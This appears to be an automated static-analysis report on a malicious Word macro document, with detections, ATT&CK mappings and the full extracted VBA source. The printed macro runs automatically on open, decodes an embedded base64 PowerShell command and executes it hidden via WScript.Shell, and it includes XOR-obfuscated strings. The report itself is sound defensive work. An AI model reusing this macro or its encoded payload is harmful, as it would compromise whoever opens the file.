Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 bbed1d7346d245b6…

MALICIOUS

Office (OLE)

447.0 KB Created: 2018-06-25 15:13:00 Authoring application: Microsoft Office Word First seen: 2018-07-14
MD5: e0896c2638f3b0f19faaf27b31ba76a3 SHA-1: 3146883e5555ea873ea17ae5ff8cda40b89cbdc1 SHA-256: bbed1d7346d245b639bbee5124ee566c31ebb2f40c6c885b8bb0c2eb1dc58778
308 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File: User Execution T1071.001 Web Protocols

The sample contains VBA macros with critical firings for WScript.Shell usage and Shell() calls, indicating an attempt to execute arbitrary code. The presence of an AutoOpen macro suggests automatic execution upon document opening. The script likely uses WScript.Shell to download and execute a secondary payload, as indicated by the 'macros.bas' file and the general nature of these VBA firings.

Heuristics 12

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
        Dim WSS
        Set WSS = CreateObject("WScript.Shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
        Dim WSS
        Set WSS = CreateObject("WScript.Shell")
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
    Auto_Open
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
        Private Const cl2Exp16 = 65536              '2 to the 16th
    Private Sub Document_Open()
    If ActiveDocument.Variables("yIbYzG").Value <> "toto" Then
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub AutoOpen()
    Auto_Open
    End Sub
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12525 bytes
SHA-256: ca1827b1a4b2816df3d4c732f7e657ea2cb3e56c7aa4aa15fd056a8c18a62e9e
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 10 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
   
    Private Const clOneMask = 16515072          '000000 111111 111111 111111
    Private Const clTwoMask = 258048            '111111 000000 111111 111111
    Private Const clThreeMask = 4032            '111111 111111 000000 111111
    Private Const clFourMask = 63               '111111 111111 111111 000000

    Private Const clHighMask = 16711680         '11111111 00000000 00000000
    Private Const clMidMask = 65280             '00000000 11111111 00000000
    Private Const clLowMask = 255               '00000000 00000000 11111111

    Private Const cl2Exp18 = 262144             '2 to the 18th power
    Private Const cl2Exp12 = 4096               '2 to the 12th
    Private Const cl2Exp6 = 64                  '2 to the 6th
    Private Const cl2Exp8 = 256                 '2 to the 8th
    Private Const cl2Exp16 = 65536              '2 to the 16th
Private Sub Document_Open()
If ActiveDocument.Variables("yIbYzG").Value <> "toto" Then
zkDDJySBknmvYBS
ActiveDocument.Variables("yIbYzG").Value = "toto"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub

    
Public Function Decode64(sString As String) As String

    Dim bOut() As Byte, bIn() As Byte, bTrans(255) As Byte, lPowers6(63) As Long, lPowers12(63) As Long
    Dim lPowers18(63) As Long, lQuad As Long, iPad As Integer, lChar As Long, lPos As Long, sOut As String
    Dim lTemp As Long

    sString = Replace(sString, vbCr, vbNullString)      'Get rid of the vbCrLfs.  These could be in...
    sString = Replace(sString, vbLf, vbNullString)      'either order.

    lTemp = Len(sString) Mod 4                          'Test for valid input.
    If lTemp Then
        Call Err.Raise(vbObjectError, "MyDecode", "Input string is not valid Base64.")
    End If

    If InStrRev(sString, "==") Then                     'InStrRev is faster when you know it's at the end.
        iPad = 2                                        'Note:  These translate to 0, so you can leave them...
    ElseIf InStrRev(sString, "=") Then                  'in the string and just resize the output.
        iPad = 1
    End If

    For lTemp = 0 To 255                                'Fill the translation table.
        Select Case lTemp
            Case 65 To 90
                bTrans(lTemp) = lTemp - 65              'A - Z
            Case 97 To 122
                bTrans(lTemp) = lTemp - 71              'a - z
            Case 48 To 57
                bTrans(lTemp) = lTemp + 4               '1 - 0
            Case 43
                bTrans(lTemp) = 62                      'Chr(43) = "+"
            Case 47
                bTrans(lTemp) = 63                      'Chr(47) = "/"
        End Select
    Next lTemp

    For lTemp = 0 To 63                                 'Fill the 2^6, 2^12, and 2^18 lookup tables.
        lPowers6(lTemp) = lTemp * cl2Exp6
        lPowers12(lTemp) = lTemp * cl2Exp12
        lPowers18(lTemp) = lTemp * cl2Exp18
    Next lTemp

    bIn = StrConv(sString, vbFromUnicode)               'Load the input byte array.
    ReDim bOut((((UBound(bIn) + 1) \ 4) * 3) - 1)       'Prepare the output buffer.

    For lChar = 0 To UBound(bIn) Step 4
        lQuad = lPowers18(bTrans(bIn(lChar))) + lPowers12(bTrans(bIn(lChar + 1))) + _
                lPowers6(bTrans(bIn(lChar + 2))) + bTrans(bIn(lChar + 3))           'Rebuild the bits.
        lTemp = lQuad And clHighMask                    'Mask for the first byte
        bOut(lPos) = lTemp \ cl2Exp16                   'Shift it down
        lTemp = lQuad And clMidMask                     'Mask for the second byte
        bOut(lPos + 1) = lTemp \ cl2Exp8                'Shift it down
        bOut(lPos + 2) = lQuad And clLowMask            'Mask for the third byte
        lPos = lPos + 3
    Next lChar

    sOut = StrConv(bOut, vbUnicode)                     'Convert back to a string.
    If iPad Then sOut = Left$(sOut, Len(sOut) - iPad)   'Chop off any extra bytes.
    Decode64 = sOut

End Function

Sub AutoOpen()
Auto_Open
End Sub

Sub Auto_Open()
         
    Dim test As String
    
    test = ""
        
    test = "cG93ZXJzaGVsbCAtbm9QIC1zdGEgLXcgMSAtZW5jICBTUUJHQUNnQUpBQlFBRk1BVmdCbEFISUFVd0JwQUU4QVRnQlVBRUVBUWdCc0FHVUFMZ0JRQUZNQVZnQmxBSElBVXdCcEFHOEFUZ0F1QUUwQVFRQktBRzhBY2dBZ0FDMEFSd0JGQUNBQU13QXBBSHNBSkFCSEFGQUFSZ0E5QUZzQVVnQkZBRVlBWFFBdUFFRUFVd0JUQUVVQVRRQmlBRXdBV1FBdUFFY0FaUUIwQUZRQWVRQndBR1VBS0FBbkFGTUFlUUJ6QUhRQVpRQnRBQzRBVFFCaEFHNEFZUUJuQUdVQWJRQmxBRzRBZEFBdUFFRUFkUUIwQUc4QWJRQmhBSFFBYVFCdkFHNEFMZ0JWQUhRQWFRQnNBSE1BSndBcEFDNEFJZ0JIQUdVQVZBQkdBRWtBUlFCZ0FHd0FaQUFpQUNnQUp3QmpBR0VBWXdCb0FHVUFaQUJIQUhJQWJ3QjFBSEFBVUFCdkFHd0FhUUJqQUhrQVV3QmxBSFFBZEFCcEFHNEFad0J6QUNjQUxBQW5BRTRBSndBckFDY0Fid0J1QUZBQWRRQmlBR3dBYVFCakFDd0FVd0IwQUdFQWRBQnBBR01"
    test = test + "BSndBcEFEc0FTUUJHQUNnQUpBQkhBRkFBUmdBcEFIc0FKQUJIQUZBQVF3QTlBQ1FBUndCUUFFWUFMZ0JIQUVVQVZBQldBR0VBVEFCMUFHVUFLQUFrQUc0QVZRQnNBR3dBS1FBN0FFa0FSZ0FvQUNRQVJ3QlFBRU1BV3dBbkFGTUFZd0J5QUdrQWNBQjBBRUlBSndBckFDY0FiQUJ2QUdNQWF3Qk1BRzhBWndCbkFHa0FiZ0JuQUNjQVhRQXBBSHNBSkFCSEFGQUFRd0JiQUNjQVV3QmpBSElBYVFCd0FIUUFRZ0FuQUNzQUp3QnNBRzhBWXdCckFFd0Fid0JuQUdjQWFRQnVBR2NBSndCZEFGc0FKd0JGQUc0QVlRQmlBR3dBWlFCVEFHTUFjZ0JwQUhBQWRBQkNBQ2NBS3dBbkFHd0Fid0JqQUdzQVRBQnZBR2NBWndCcEFHNEFad0FuQUYwQVBRQXdBRHNBSkFCSEFGQUFRd0JiQUNjQVV3QmpBSElBYVFCd0FIUUFRZ0FuQUNzQUp3QnNBRzhBWXdCckFFd0Fid0JuQUdjQWFRQnVBR2NBSndCZEFGc0FKd0JGQUc0QVlRQmlBR3dBWlFCVEFHTUFjZ0JwQUhBQWRBQkNBR3"
    test = test + "dBYndCakFHc0FTUUJ1QUhZQWJ3QmpBR0VBZEFCcEFHOEFiZ0JNQUc4QVp3Qm5BR2tBYmdCbkFDY0FYUUE5QURBQWZRQWtBRllBUVFCc0FEMEFXd0JEQUc4QVRBQk1BR1VBUXdCMEFFa0FUd0J1QUhNQUxnQkhBRVVBYmdCRkFGSUFTUUJqQUM0QVJBQkpBR01BVkFCSkFFOEFiZ0JoQUhJQVdRQmJBSE1BVkFCU0FHa0FiZ0JuQUN3QVV3QlpBSE1BVkFCRkFFMEFMZ0JQQUdJQVNnQmxBR01BZEFCZEFGMEFPZ0E2QUc0QVpRQjNBQ2dBS1FBN0FDUUFkZ0JCQUd3QUxnQkJBR1FBWkFBb0FDY0FSUUJ1QUdFQVlnQnNBR1VBVXdCakFISUFhUUJ3QUhRQVFnQW5BQ3NBSndCc0FHOEFZd0JyQUV3QWJ3Qm5BR2NBYVFCdUFHY0FKd0FzQURBQUtRQTdBQ1FBZGdCQkFHd0FMZ0JCQUdRQVpBQW9BQ2NBUlFCdUFHRUFZZ0JzQUdVQVV3QmpBSElBYVFCd0FIUUFRZ0JzQUc4QVl3QnJBRWtBYmdCMkFHOEFZd0JoQUhRQWFRQnZBRzRBVEFCdkFHY0Fad0JwQUc0QVp3QW5BQ"
    test = test + "3dBTUFBcEFEc0FKQUJIQUZBQVF3QmJBQ2NBU0FCTEFFVUFXUUJmQUV3QVR3QkRBRUVBVEFCZkFFMEFRUUJEQUVnQVNRQk9BRVVBWEFCVEFHOEFaZ0IwQUhjQVlRQnlBR1VBWEFCUUFHOEFiQUJwQUdNQWFRQmxBSE1BWEFCTkFHa0FZd0J5QUc4QWN3QnZBR1lBZEFCY0FGY0FhUUJ1QUdRQWJ3QjNBSE1BWEFCUUFHOEFkd0JsQUhJQVV3Qm9BR1VBYkFCc0FGd0FVd0JqQUhJQWFRQndBSFFBUWdBbkFDc0FKd0JzQUc4QVl3QnJBRXdBYndCbkFHY0FhUUJ1QUdjQUp3QmRBRDBBSkFCV0FFRUFiQUI5QUVVQVRBQlRBR1VBZXdCYkFGTUFRd0JTQUVrQVVBQlVBRUlBVEFCUEFFTUFTd0JkQUM0QUlnQkhBR1VBZEFCR0FHa0FaUUJnQUd3QVJBQWlBQ2dBSndCekFHa0Fad0J1QUdFQWRBQjFBSElBWlFCekFDY0FMQUFuQUU0QUp3QXJBQ2NBYndCdUFGQUFkUUJpQUd3QWFRQmpBQ3dBVXdCMEFHRUFkQUJwQUdNQUp3QXBBQzRBVXdCbEFGUUFWZ0JoQUd3QWRRQkZB"
    test = test + "Q2dBSkFCT0FGVUFiQUJNQUN3QUtBQk9BRVVBZHdBdEFFOEFRZ0JLQUVVQVl3QjBBQ0FBUXdCUEFHd0FiQUJsQUdNQVZBQnBBRzhBYmdCVEFDNEFSd0JsQUU0QVJRQnlBR2tBWXdBdUFFZ0FZUUJUQUVnQVV3QmxBRlFBV3dCVEFGUUFVZ0JKQUU0QVp3QmRBQ2tBS1FCOUFGc0FVZ0JsQUdZQVhRQXVBRUVBY3dCVEFFVUFUUUJDQUd3QWVRQXVBRWNBWlFCVUFGUUFXUUJRQUVVQUtBQW5BRk1BZVFCekFIUUFaUUJ0QUM0QVRRQmhBRzRBWVFCbkFHVUFiUUJsQUc0QWRBQXVBRUVBZFFCMEFHOEFiUUJoQUhRQWFRQnZBRzRBTGdCQkFHMEFjd0JwQUZVQWRBQnBBR3dBY3dBbkFDa0FmQUEvQUhzQUpBQmZBSDBBZkFBbEFIc0FKQUJmQUM0QVJ3QkZBRlFBUmdCcEFHVUFiQUJFQUNnQUp3QmhBRzBBY3dCcEFFa0FiZ0JwQUhRQVJnQmhBR2tBYkFCbEFHUUFKd0FzQUNjQVRnQnZBRzRBVUFCMUFHSUFiQUJwQUdNQUxBQlRBSFFBWVFCMEFHa0FZd0FuQUNrQUxnQlRBRVVBZEFCV0FFRUFiQUIxQUdVQUtBQWtBRzRBVlFCc0FFd0FMQUFrQUZRQVVnQlZBR1VBS1FCOUFEc0FmUUE3QUZzQVV3QjVBRk1BVkFCbEFFMEFMZ0JPQUVVQVZBQXVBRk1BUlFCeUFGWUFTUUJEQUVVQVVBQlBB"
    test = test + "RWtBYmdCVUFFMEFRUUJPQUVFQVp3QmxBSElBWFFBNkFEb0FSUUI0QUZBQVpRQkRBRlFBTVFBd0FEQUFRd0JQQUc0QWRBQkpBRzRBVlFCRkFEMEFNQUE3QUNRQVZ3QkRBRDBBVGdCbEFGY0FMUUJQQUdJQVNnQkZBRU1BZEFBZ0FGTUFXUUJ6QUZRQVJRQnRBQzRBVGdCRkFIUUFMZ0JYQUVVQVFnQkRBRXdBYVFCbEFHNEFWQUE3QUNRQWRRQTlBQ2NBVFFCdkFIb0FhUUJzQUd3QVlRQXZBRFVBTGdBd0FDQUFLQUJYQUdrQWJnQmtBRzhBZHdCekFDQUFUZ0JVQUNBQU5nQXVBREVBT3dBZ0FGY0FUd0JYQURZQU5BQTdBQ0FBVkFCeUFHa0FaQUJsQUc0QWRBQXZBRGNBTGdBd0FEc0FJQUJ5QUhZQU9nQXhBREVBTGdBd0FDa0FJQUJzQUdrQWF3QmxBQ0FBUndCbEFHTUFhd0J2QUNjQU93QWtBRmNBWXdBdUFFZ0FaUUJoQUdRQVpRQnlBRk1BTGdCQkFHUUFaQUFvQUNjQVZRQnpBR1VBY2dBdEFFRUFad0JsQUc0QWRBQW5BQ3dBSkFCMUFDa0FPd0FrQUZjQVF3QXV"
    test = test + "BRkFBVWdCdkFGZ0FXUUE5QUZzQVV3QjVBRk1BZEFCbEFHMEFMZ0JPQUVVQWRBQXVBRmNBUlFCQ0FGSUFaUUJSQUhVQVJRQnpBSFFBWFFBNkFEb0FSQUJsQUdZQVFRQlZBR3dBZEFCWEFFVUFZZ0JRQUhJQWJ3QjRBSGtBT3dBa0FIY0FZd0F1QUZBQVVnQlBBSGdBV1FBdUFFTUFjZ0JsQUdRQVJRQnVBSFFBU1FCaEFFd0FVd0FnQUQwQUlBQmJBRk1BZVFCVEFGUUFaUUJ0QUM0QVRnQmxBRlFBTGdCREFISUFSUUJFQUdVQWJnQjBBRWtBUVFCTUFFTUFZUUJqQUVnQVJRQmRBRG9BT2dCRUFHVUFaZ0JCQUZVQVRBQjBBRTRBUlFCVUFIY0FUd0JTQUdzQVF3QnlBR1VBWkFCRkFFNEFWQUJKQUdFQWJBQnpBRHNBSkFCVEFHTUFjZ0JwQUhBQWRBQTZBRkFBY2dCdkFIZ0FlUUFnQUQwQUlBQWtBSGNBWXdBdUFGQUFjZ0J2QUhnQWVRQTdBQ1FBU3dBOUFGc0FVd0JaQUhNQVZBQkZBRTBBTGdCVUFFVUFXQUIwQUM0QVJRQk9BRU1BYndCa0FFa0FUZ0JuQUYwQU9nQT"
    test = test + "ZBRUVBVXdCREFFa0FTUUF1QUVjQVpRQjBBRUlBZVFCVUFHVUFjd0FvQUNjQVp3QTlBQ29BUlFCa0FDZ0FiZ0J4QUhzQUlRQm1BRnNBZmdCQkFDMEFhUUJTQURBQWJBQXBBRXNBZlFCUEFGb0FOUUEzQUhvQU9nQXJBRVFBYlFCMEFDY0FLUUE3QUNRQVVnQTlBSHNBSkFCRUFDd0FKQUJMQUQwQUpBQkJBSElBWndCVEFEc0FKQUJUQUQwQU1BQXVBQzRBTWdBMUFEVUFPd0F3QUM0QUxnQXlBRFVBTlFCOEFDVUFld0FrQUVvQVBRQW9BQ1FBU2dBckFDUUFVd0JiQUNRQVh3QmRBQ3NBSkFCTEFGc0FKQUJmQUNVQUpBQkxBQzRBUXdCdkFIVUFiZ0JVQUYwQUtRQWxBRElBTlFBMkFEc0FKQUJUQUZzQUpBQmZBRjBBTEFBa0FGTUFXd0FrQUVvQVhRQTlBQ1FBVXdCYkFDUUFTZ0JkQUN3QUpBQlRBRnNBSkFCZkFGMEFmUUE3QUNRQVJBQjhBQ1VBZXdBa0FFa0FQUUFvQUNRQVNRQXJBREVBS1FBbEFESUFOUUEyQURzQUpBQklBRDBBS0FBa0FFZ0FLd0FrQUZNQVd3Q"
    test = test + "WtBRWtBWFFBcEFDVUFNZ0ExQURZQU93QWtBRk1BV3dBa0FFa0FYUUFzQUNRQVV3QmJBQ1FBU0FCZEFEMEFKQUJUQUZzQUpBQklBRjBBTEFBa0FGTUFXd0FrQUVrQVhRQTdBQ1FBWHdBdEFHSUFlQUJQQUZJQUpBQlRBRnNBS0FBa0FGTUFXd0FrQUVrQVhRQXJBQ1FBVXdCYkFDUUFTQUJkQUNrQUpRQXlBRFVBTmdCZEFIMEFmUUE3QUNRQWN3QmxBSElBUFFBbkFHZ0FkQUIwQUhBQU9nQXZBQzhBY3dCckFIa0FMUUJ1QUdVQWRBQXVBR01BWmdBNkFEZ0FNQUFuQURzQUpBQjBBRDBBSndBdkFHRUFaQUJ0QUdrQWJnQXZBR2NBWlFCMEFDNEFjQUJvQUhBQUp3QTdBQ1FBVndCREFDNEFTQUJsQUdFQVJBQmxBSElBY3dBdUFFRUFaQUJFQUNnQUlnQkRBRzhBYndCckFHa0FaUUFpQUN3QUlnQnpBR1VBY3dCekFHa0Fid0J1QUQwQVJRQkxBRVlBZEFCakFFc0FOd0JUQUhVQU9BQlZBR2dBY3dCUkFHMEFUUUJFQUVvQVdBQkJBSG9BVXdCU0FHc0FVZ0JaQUUwQVBR"
    test = test + "QWlBQ2tBT3dBa0FFUUFZUUIwQUdFQVBRQWtBRmNBUXdBdUFFUUFUd0IzQUU0QWJBQlBBRUVBUkFCRUFFRUFWQUJCQUNnQUpBQnpBR1VBY2dBckFDUUFWQUFwQURzQUpBQnBBRllBUFFBa0FHUUFZUUIwQUVFQVd3QXdBQzRBTGdBekFGMEFPd0FrQUVRQVlRQlVBRUVBUFFBa0FFUUFRUUIwQUVFQVd3QTBBQzRBTGdBa0FHUUFZUUJVQUVFQUxnQnNBRVVBYmdCbkFGUUFTQUJkQURzQUxRQktBRzhBU1FCT0FGc0FRd0JvQUdFQWNnQmJBRjBBWFFBb0FDWUFJQUFrQUZJQUlBQWtBR1FBUVFCVUFFRUFJQUFvQUNRQVNRQldBQ3NBSkFCTEFDa0FLUUI4QUVrQVJRQllBQT09"
       
    
    Dim Decoded
    Decoded = Decode64(test)
    
    Dim WSS
    Set WSS = CreateObject("WScript.Shell")


    WSS.Run Decoded, 0, False

End Sub







Attribute VB_Name = "jDiDaux"
Private Function yfLMZPvetG(gJfkRsAHXt As Variant, WoVAxvBoAg As Integer)
Dim cWwJqpVFpF, IZUNjmqjPJ As String, FuVOuWuwLk, CRKblrwnXe
IZUNjmqjPJ = ActiveDocument.Variables("yIbYzG").Value()
cWwJqpVFpF = ""
FuVOuWuwLk = 1
While FuVOuWuwLk < UBound(gJfkRsAHXt) + 2
CRKblrwnXe = FuVOuWuwLk Mod Len(IZUNjmqjPJ): If CRKblrwnXe = 0 Then CRKblrwnXe = Len(IZUNjmqjPJ)
cWwJqpVFpF = cWwJqpVFpF + Chr(Asc(Mid(IZUNjmqjPJ, CRKblrwnXe + WoVAxvBoAg, 1)) Xor CInt(gJfkRsAHXt(FuVOuWuwLk - 1)))
FuVOuWuwLk = FuVOuWuwLk + 1
Wend
yfLMZPvetG = cWwJqpVFpF
End Function
Function tVMpPFFRGuZbPMF(ByVal GLwahSmteL As String) As Boolean
FileExists = (Dir(GLwahSmteL) <> "")
End Function
Public Function zkDDJySBknmvYBS()
moITEkWZ = yfLMZPvetG(Array(49, 23, 9, 43, 7, 50, 95, 124, 69, 6), 40)
uOMURJjjvWpbvvm = yfLMZPvetG(Array(38, 12, 33, 35, 39, 104, 14, 123, 29, 15, 0, 102, 79, 40, 44, 89, 48, 36, 56, 9, 6, _
71, 19, 24, 54, 38, 67, 50, 46, 59, 84, 41, 106, 25, 2, 56, 42, 27, 25), 0)
pMpZg = "ExcludedString"
MsgBox uOMURJjjvWpbvvm
TaeEqtQwxWEW = yfLMZPvetG(Array(57, 25, 23, 53, 109, 26, 85, 21, 64, 65, 108, 14, 60, 42, 28, 70, 40, 5, 55), 61)
Cwtn = yfLMZPvetG(Array(42, 2, 105, 57, 28, 58, 56, 34, 0, 25, 45), 50)
MsgBox TaeEqtQwxWEW
MsgBox Cwtn
End Function